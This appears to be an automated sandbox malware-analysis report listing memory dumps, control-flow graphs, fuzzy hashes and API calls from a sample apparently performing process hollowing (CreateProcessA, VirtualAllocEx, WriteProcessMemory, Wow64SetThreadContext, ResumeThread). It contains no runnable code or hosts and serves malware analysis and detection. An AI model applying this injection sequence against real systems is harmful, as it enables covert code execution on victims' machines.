                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l$48l
                                      • API String ID: 0-1341598364
                                      • Opcode ID: 1e03b1273c0e8fddbe6a9f8cd5ff83264cd79508489628611fcd592fb25fa315
                                      • Instruction ID: 9cb77a7367c1745f3e96fe343bce106601d623dee9c854060039c747b3f45bc9
                                      • Opcode Fuzzy Hash: 1e03b1273c0e8fddbe6a9f8cd5ff83264cd79508489628611fcd592fb25fa315
                                      • Instruction Fuzzy Hash: FE416B34925A16CBC7209FA8C8086BABBF1FF44315F58C167E42DD72A6D3B4D960C751
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 755 f07270-f07309 757 f07352-f0737a 755->757 758 f0730b-f07322 755->758 762 f073c0-f07416 757->762 763 f0737c-f07390 757->763 758->757 761 f07324-f07329 758->761 764 f0732b-f07335 761->764 765 f0734c-f0734f 761->765 772 f07418-f0742c 762->772 773 f0745c-f07553 CreateProcessA 762->773 763->762 770 f07392-f07397 763->770 766 f07337 764->766 767 f07339-f07348 764->767 765->757 766->767 767->767 771 f0734a 767->771 774 f07399-f073a3 770->774 775 f073ba-f073bd 770->775 771->765 772->773 781 f0742e-f07433 772->781 791 f07555-f0755b 773->791 792 f0755c-f07641 773->792 776 f073a5 774->776 777 f073a7-f073b6 774->777 775->762 776->777 777->777 780 f073b8 777->780 780->775 783 f07435-f0743f 781->783 784 f07456-f07459 781->784 785 f07441 783->785 786 f07443-f07452 783->786 784->773 785->786 786->786 787 f07454 786->787 787->784 791->792 804 f07651-f07655 792->804 805 f07643-f07647 792->805 807 f07665-f07669 804->807 808 f07657-f0765b 804->808 805->804 806 f07649 805->806 806->804 810 f07679-f0767d 807->810 811 f0766b-f0766f 807->811 808->807 809 f0765d 808->809 809->807 812 f076b3-f076be 810->812 813 f0767f-f076a8 810->813 811->810 814 f07671 811->814 818 f076bf 812->818 813->812 814->810 818->818
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F07537
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_f00000_mum.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 4d3c98030227b093a0f7a5a3f6066f2c3eb2066a8b3d3f7bb4a5c2626e7b83fd
                                      • Instruction ID: 1119b9debb64f94215d6e84636a1859e07b46191b1c3eff210b7824e2031127d
                                      • Opcode Fuzzy Hash: 4d3c98030227b093a0f7a5a3f6066f2c3eb2066a8b3d3f7bb4a5c2626e7b83fd
                                      • Instruction Fuzzy Hash: 58C13770D0421D8FDF24DFA4C841BEDBBB1BB49314F0095A9E919B7280DB70AA85EF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 819 274051-274118 831 274504-27454a 819->831 832 27411e-27486e 819->832 836 27454c-274585 831->836 837 27458b-274592 831->837 836->837 838 274594-2745cd 837->838 839 2745d3-2745da 837->839 838->839 841 2745dc-274615 839->841 842 27461b-274622 839->842 841->842 844 274696-2746f4 842->844 845 274624-27462f 842->845 852 2746f6-274726 844->852 853 274728-27474f 844->853 847 274688-274694 845->847 847->844 848 274631-274685 847->848 848->847 857 274758-2747c2 852->857 853->857 860 2747c8-2747d4 857->860 861 2747db-2747ee 860->861 862 2747fd-274827 861->862 865 274842-27484d 862->865 866 274829-27482c 862->866 867 274854-27485a 865->867 868 27484f 865->868 869 27482e-27483c 866->869 868->867 869->865 870 274166-274174 869->870 871 274176 870->871 872 27417b-2741d7 870->872 871->872 875 274264-274268 872->875 875->869 876 27426e-274275 875->876 877 2741dc-2741fd 876->877 878 27427b-2742b0 876->878 881 2741ff-274202 877->881 882 274209-274215 877->882 886 2742b2-2742be 878->886 887 2742da 878->887 883 274206-274207 881->883 882->883 885 274217-274218 882->885 883->878 888 274255-27425c 885->888 892 2742c0-2742c6 886->892 893 2742c8-2742ce 886->893 889 2742e0-274313 887->889 890 27425e-274261 888->890 891 27421a-274228 888->891 901 274315-27434d 889->901 902 274362-27440d 889->902 890->875 895 27422f-274237 891->895 896 27422a 891->896 897 2742d8 892->897 893->897 898 27424f-274252 895->898 899 274239-27424d 895->899 896->895 897->889 898->888 899->890 901->862 910 274477-274483 902->910 911 274485-2744fe 910->911 912 27440f-274437 910->912 911->831 913 27443e-27446b 912->913 914 274439 912->914 913->878 920 274471-274474 913->920 914->913 920->910
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ~
                                      • API String ID: 0-1707062198
                                      • Opcode ID: 379644157c08e3d11780122bd1225624ca88a5a4851a210dc1d8175c87a1ab73
                                      • Instruction ID: 163508e63ba6108589b3ae9dee10d8bfa58f4d259658da127dd8967f314184e1
                                      • Opcode Fuzzy Hash: 379644157c08e3d11780122bd1225624ca88a5a4851a210dc1d8175c87a1ab73
                                      • Instruction Fuzzy Hash: 7B42CD75A10218DFCB15DF98C980E99BBB2FF49314F1581E5EA09AB222C731EDA1DF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 922 f06e48-f06eb3 924 f06eb5-f06ec7 922->924 925 f06eca-f06f31 WriteProcessMemory 922->925 924->925 927 f06f33-f06f39 925->927 928 f06f3a-f06f8c 925->928 927->928
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F06F1B
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_f00000_mum.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 86de0e92c73429ca1e7f545fd9b44e57006ec57fcefa2e66b51638ffef651c5f
                                      • Instruction ID: c84a07d879d49f21ace8cb3b4868a6be242e9506c420e68881c11189292f1c84
                                      • Opcode Fuzzy Hash: 86de0e92c73429ca1e7f545fd9b44e57006ec57fcefa2e66b51638ffef651c5f
                                      • Instruction Fuzzy Hash: 0C41B8B4D002189FCF00CFA9D984AEEBBB1BF49314F20942AE814BB240D734AA55CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F0708A
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_f00000_mum.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 0bf9293737dc35fd85bea80e59ef7adaf2c1f451f591f992ac7c758417f1a794
                                      • Instruction ID: baee3e86dbaaaa0ed15308b7b9a38387e26da462479b17a0650284cffbee1ab4
                                      • Opcode Fuzzy Hash: 0bf9293737dc35fd85bea80e59ef7adaf2c1f451f591f992ac7c758417f1a794
                                      • Instruction Fuzzy Hash: F341C8B5D042589FCF10CFA9D884AEEFBB1BF49310F10942AE815B7240D775A916CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F0708A
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_f00000_mum.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: f112933abd9b4ec42418d5897807f548082ed96f4bdb661dec1f80f81a51df27
                                      • Instruction ID: 769d19b7666c86ecbed25c16686fa59a85726d2830121904b716f6c1b8fb20ac
                                      • Opcode Fuzzy Hash: f112933abd9b4ec42418d5897807f548082ed96f4bdb661dec1f80f81a51df27
                                      • Instruction Fuzzy Hash: ED41A7B5D042589FCF10CFA9D884AEEFBB1BF49310F10A42AE814B7240D735A955CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F06D9A
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_f00000_mum.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: a2d3009157de856179a7b04979d844557db36f8544ada1e9db1284b11c3252aa
                                      • Instruction ID: e457a25f784fd6e103a02b68dd7f5be6a52ec11fe48204956df1d908f3723d6b
                                      • Opcode Fuzzy Hash: a2d3009157de856179a7b04979d844557db36f8544ada1e9db1284b11c3252aa
                                      • Instruction Fuzzy Hash: 764199B8D042589FCF10CFA9D884ADEBBB1FF49310F10942AE914B7240D735A915CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00F06BAF
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_f00000_mum.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 6e15ac2407ee5bd07d84effa1222428015ff01a123a60fbee42a244643760431
                                      • Instruction ID: a2ee9e2ee3d7efb6e70a8d3112538de42c3209fc48fe2381f9b0d2ace50f680d
                                      • Opcode Fuzzy Hash: 6e15ac2407ee5bd07d84effa1222428015ff01a123a60fbee42a244643760431
                                      • Instruction Fuzzy Hash: EA41DCB4D042589FCF10CFA9D884AEEBBB1FF49314F24842AE815B7240D778A955CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00F06BAF
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_f00000_mum.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 2d09efe9762f3f20f50360065428fc50b644a14c03d3cdd6806d1b86055dba51
                                      • Instruction ID: b221a6a8066f6c0ecd274c3c8d49d68be499dba44506c149f5dcd3491f255719
                                      • Opcode Fuzzy Hash: 2d09efe9762f3f20f50360065428fc50b644a14c03d3cdd6806d1b86055dba51
                                      • Instruction Fuzzy Hash: E641ACB4D002589FCB14CFA9D884AEEFBB1FF49314F24842AE414B7240D779A955CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 00F06A5E
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_f00000_mum.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: fae52bf60b7d093577f054fd17038688315bc11e2974c2d5453d0113142edca7
                                      • Instruction ID: eec314f3bbe2f32b41ac837ebdceb7b2cf72342aaa1a111742efc24ccecfc143
                                      • Opcode Fuzzy Hash: fae52bf60b7d093577f054fd17038688315bc11e2974c2d5453d0113142edca7
                                      • Instruction Fuzzy Hash: DD31CCB5D012189FCF14DFA9E884ADEFBB5EF49314F10941AE815B7240D735A912CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 00F06A5E
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_f00000_mum.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 81b0e08d5cf999ed7f86178e767725b2e6e63ba5417fe2cbf37729f6192e5737
                                      • Instruction ID: fae517eb55dc3112470d42807752445efe310324d0e203f94315d420cf0e72b3
                                      • Opcode Fuzzy Hash: 81b0e08d5cf999ed7f86178e767725b2e6e63ba5417fe2cbf37729f6192e5737
                                      • Instruction Fuzzy Hash: DD31BAB4D002189FCF14DFA9D884A9EFBB5EF49314F10942AE815B7340D735A901CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl
                                      • API String ID: 0-3640630996
                                      • Opcode ID: f1084ccb8a1574de7f2e8117c0e1de3cd09438f0252ce958ccf3ffd4099bb774
                                      • Instruction ID: 116c3e0f4ded1ec1ef7891ae31e027a2c7ed447bca1329b48ff1b56c1df4a29f
                                      • Opcode Fuzzy Hash: f1084ccb8a1574de7f2e8117c0e1de3cd09438f0252ce958ccf3ffd4099bb774
                                      • Instruction Fuzzy Hash: A15149B8D0021ADFDF00CFA9D891AEEBBB1BF89300F10A569D415EB250DB30A955CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l
                                      • API String ID: 0-3926459034
                                      • Opcode ID: 8f513d2aadba8952ee19c8ecd008d5d053638f6d775b7db08d5c81511387d9ea
                                      • Instruction ID: 1506c3784dea52d09885f2bd47c41fb283a836ff0106158cff58f9ac25b9e6f2
                                      • Opcode Fuzzy Hash: 8f513d2aadba8952ee19c8ecd008d5d053638f6d775b7db08d5c81511387d9ea
                                      • Instruction Fuzzy Hash: 8F31F630A21A26CFCB108FA8C84567EF7F5FB45340F54843AE00AE7691DBF49960CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `!l
                                      • API String ID: 0-283557256
                                      • Opcode ID: 18dc0192a19ba23b1576e7c777c24eef9bb56e8ff23e7a4ce471130108471298
                                      • Instruction ID: 359564090bd0914dc4e171cebbc219c2f764a26f0f76ad9e9cee528ec4a56fcb
                                      • Opcode Fuzzy Hash: 18dc0192a19ba23b1576e7c777c24eef9bb56e8ff23e7a4ce471130108471298
                                      • Instruction Fuzzy Hash: 8D312674E0021C9FCB09DFA9D8515EEBBB2FF88300F14802AE515A73A1EB355906CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: B-z
                                      • API String ID: 0-1806057957
                                      • Opcode ID: 93b08f3dfb1c03fcb045a83d4dc0a14878d3a0bf53fc084031c5cca39f0bab21
                                      • Instruction ID: db40634675bd026b883cb6e53b68db724effbda8bb9d565df48355909bc2c392
                                      • Opcode Fuzzy Hash: 93b08f3dfb1c03fcb045a83d4dc0a14878d3a0bf53fc084031c5cca39f0bab21
                                      • Instruction Fuzzy Hash: 46217A70E092198FCB18CFAAC846AEEFBB6EF89310F44952AD815B7350DB744905CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl
                                      • API String ID: 0-3640630996
                                      • Opcode ID: 0f3fac5908242a07da5637fbe725d2ff761221d20cc6cf75130aae52e46ea5c3
                                      • Instruction ID: 21544dee0b960ae9d367d6e242a51ecc7e1033ee84bdaf1061dfb6611c85238d
                                      • Opcode Fuzzy Hash: 0f3fac5908242a07da5637fbe725d2ff761221d20cc6cf75130aae52e46ea5c3
                                      • Instruction Fuzzy Hash: 5F21D2323145218FC765DB7CE82496A77F5DF8975430280BAE64ECB7B1DB20CC628B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: B-z
                                      • API String ID: 0-1806057957
                                      • Opcode ID: 91625c5e5e693fb1d20f86df4db8115a8a3f2d14df9323954cfb6ee236519400
                                      • Instruction ID: 1cea01973ed7c2a9dcb82d58cca0c08af3a2a94b319f4a70c84d5a6ee3f6558d
                                      • Opcode Fuzzy Hash: 91625c5e5e693fb1d20f86df4db8115a8a3f2d14df9323954cfb6ee236519400
                                      • Instruction Fuzzy Hash: 56214C74E042198BCB04CFAAC8469EEFBBAFB8D310F44A52AD815B3354DB745941CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l
                                      • API String ID: 0-3926459034
                                      • Opcode ID: c3c6b4fbdb3b21fbe370207afb3e6b70972cd3f7149f6b6acfe11981ae3c9199
                                      • Instruction ID: 12b46561e9f4c47cf0a858218e81324000eb85f1c6e8e287529b96eed9eacbfa
                                      • Opcode Fuzzy Hash: c3c6b4fbdb3b21fbe370207afb3e6b70972cd3f7149f6b6acfe11981ae3c9199
                                      • Instruction Fuzzy Hash: 17114830718700DFC7518BA89C09B6B77A1FB85745F60853AE90EDB7C2DBB08C508390
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )
                                      • API String ID: 0-2427484129
                                      • Opcode ID: dfcb7306d0c34f30f3aeb82c2daf74f48d601f36d9fb6327ecd51826043d199e
                                      • Instruction ID: 83637e4e23ccb27f80a02caf79bf04272f829892e6dac4072f98337866ac4a56
                                      • Opcode Fuzzy Hash: dfcb7306d0c34f30f3aeb82c2daf74f48d601f36d9fb6327ecd51826043d199e
                                      • Instruction Fuzzy Hash: E8E09A2001E288AFC301CBA4CC29A697BBC9F43205F1940D5E44983962C6B00E64EBA6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2
                                      • API String ID: 0-450215437
                                      • Opcode ID: 303862212c08b1539ebd099476ae40157d107c84ceecc68a3a64f9e6a4ed0464
                                      • Instruction ID: 1c16f715fe799bd68b86e7b3fb605a1c77cb531b58ac1d05bc09f2c8f5b75e93
                                      • Opcode Fuzzy Hash: 303862212c08b1539ebd099476ae40157d107c84ceecc68a3a64f9e6a4ed0464
                                      • Instruction Fuzzy Hash: A7D0A7305AA208D6CA00DBA4E80666A736CC742309F10A458D40D135518AF00EA0EE86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: d96f8c02eb48d6db2b24b8c15fea0ced455ef3c54c9a285c3e10bdcd94dcc2a7
                                      • Instruction ID: 6ab1a1e19e49e12545b6067e8f7e4d96b193cfc5248025d483c1454e133b565b
                                      • Opcode Fuzzy Hash: d96f8c02eb48d6db2b24b8c15fea0ced455ef3c54c9a285c3e10bdcd94dcc2a7
                                      • Instruction Fuzzy Hash: C8D0A770469108E7C620FBE4D80677D776C8702705F108498D54D5395187F00F20AA86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )
                                      • API String ID: 0-2427484129
                                      • Opcode ID: 3793f444cfcf4066e5a48bd01b7c95d3c5bc1185c10ad582ffe57728e82230e1
                                      • Instruction ID: 3c8938fba65b49caae49139b6225f523678b4630b9f81cc47348bc7c408cdbe2
                                      • Opcode Fuzzy Hash: 3793f444cfcf4066e5a48bd01b7c95d3c5bc1185c10ad582ffe57728e82230e1
                                      • Instruction Fuzzy Hash: 67D0A77001920CDBC704DBA4D80966DB76C9F06306F144054D40E53650C7B00F70FAD5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1356975d3e9c8977c8534cf74044b0f2aebad2a219cf25f88b1797b45f005d01
                                      • Instruction ID: eb36413c4a814a01eaddabe9d18c78fcc580319872a8b08261d25c7687d7036e
                                      • Opcode Fuzzy Hash: 1356975d3e9c8977c8534cf74044b0f2aebad2a219cf25f88b1797b45f005d01
                                      • Instruction Fuzzy Hash: 82F1C274A002288FCB64DF64D991B9DB7B2EF88300F1080EAE94DA7755DB319E92CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a154e329852c3b01b6e01fdbf267c66cbba62528d21ec471209937ff40ba44d9
                                      • Instruction ID: 63f557e09be15f75dfd90197caf958564ced3dad3bc52e0da17236eb6c8bd05a
                                      • Opcode Fuzzy Hash: a154e329852c3b01b6e01fdbf267c66cbba62528d21ec471209937ff40ba44d9
                                      • Instruction Fuzzy Hash: F481C374A142288FDB50DFA8C980B9DBBB2EB49314F2481A9D959AB346D731AD42CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60c4b15ba04cb06596abc4126efd5d289f8e60f4eadb9e95e11963dc40ee5c63
                                      • Instruction ID: 9994acaef72f7c3043cbc275992b3450e71f535bea3fe5e1fc1d1df5a825583c
                                      • Opcode Fuzzy Hash: 60c4b15ba04cb06596abc4126efd5d289f8e60f4eadb9e95e11963dc40ee5c63
                                      • Instruction Fuzzy Hash: A6517070A24A29CFC714DF68C985ABEF7F2FF44301F14C556E459AB292C774A860CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d71af2d8ee6125e95940cd5342072a59850d7f16dceeed33edc0cc2ff4490721
                                      • Instruction ID: 000e33ca1fb5b192f72d7ff05d65d705541a3ce01dd0c550cc5ee85847e40efb
                                      • Opcode Fuzzy Hash: d71af2d8ee6125e95940cd5342072a59850d7f16dceeed33edc0cc2ff4490721
                                      • Instruction Fuzzy Hash: 5D71D574A04229CFDB15DF58C980BAAB7B2FF49304F148599E918AB356CB31EE41CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 481e80e1031cee2c2156ef5fee6297d37165de4aae11e92c656e228d6b5ae1d3
                                      • Instruction ID: 959b775dc7c7e70f63da5c3bd1085112cfbc28f9d1c2a1ca720d94dadf309714
                                      • Opcode Fuzzy Hash: 481e80e1031cee2c2156ef5fee6297d37165de4aae11e92c656e228d6b5ae1d3
                                      • Instruction Fuzzy Hash: 12417074D25629DFCB00CFA9D9846EDFBF4AB0D301F609469E819B3300E7B19A519F94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb4c7e72901fc390bf49cd39d0915fc8433b839038b12f44a8a72c210fb0fa72
                                      • Instruction ID: d5f7a98b64806d24ca0e89d4b3fa8fc14f79349e052796dfb3e573d64c8865ab
                                      • Opcode Fuzzy Hash: bb4c7e72901fc390bf49cd39d0915fc8433b839038b12f44a8a72c210fb0fa72
                                      • Instruction Fuzzy Hash: F241D534A04228CFDB50DF68D951B99B7B2FB89304F1480EAD94DA7345CB31AE52CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 444ff1f8c690a47487da58bab53583a0bb80b90a4d1b86a6ee4f455e5bba9e0f
                                      • Instruction ID: dc5de16e92c7617bcbd7d5b6633f8cbf3581c0609580dde7f7a8beb484816b90
                                      • Opcode Fuzzy Hash: 444ff1f8c690a47487da58bab53583a0bb80b90a4d1b86a6ee4f455e5bba9e0f
                                      • Instruction Fuzzy Hash: 5641C27490A668CFDB60DF65CC4CBA9BBB5BB48311F10A1E9D80EA7250DBB15AC5CF04
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
